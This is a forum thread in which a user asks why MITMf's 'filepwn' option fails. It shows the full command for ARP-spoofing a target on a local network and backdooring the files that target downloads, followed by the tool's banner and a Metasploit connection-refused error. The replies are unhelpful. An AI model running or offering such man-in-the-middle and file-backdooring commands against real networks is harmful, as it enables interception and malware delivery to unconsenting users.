Forum Thread: Hello All,

First of all, I'd like to say that I followed many of yours articles and tutorials, it's very well made.
Now I have a problem with Mitmf. I try to use the "filepwn" argument to send payload to a target.
But, here's the result:
python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.0.254 --target 192.168.0.19 --filepwn

____¦¦¦____ _¦ ¦¦¦ ____¦¦¦____ _¦¦¦¦¦¦¦¦
_¦¦¯¯¯¦¦¦¯¯¯¦¦_ ¦¦¦ ¯¦¦¦¦¦¦¦¦¦_ _¦¦¯¯¯¦¦¦¯¯¯¦¦_ ¦¦¦ ¦¦¦
¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¯¦¦¦¯¯¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¯
¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¯ ¦¦¦ ¦¦¦ ¦¦¦ _¦¦¦___
¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¯¯¦¦¦¯¯¯
¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦
¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦ ¦¦¦
¯¦ ¦¦¦ ¦¯ ¦¯ _¦¦¦¦¯ ¯¦ ¦¦¦ ¦¯ ¦¦¦

* MITMf v0.9.8 - 'The Dark Side'
|
| Net-Creds v1.0 online
|
FilePwn v0.3
| | BDFProxy v0.3.2 online

Msfrpc Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=8080): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xb2c7df8c>: Failed to establish a new connection: Errno 111 Connection refused',))

I guess it's about the mitmf.conf file, but I don't know what to change...
Any suggestion?

2 Responses

It seems your connection was refused.

Yeah, thanks, I could guess.
I wanna know why

Share Your Thoughts

  • Hot
  • Active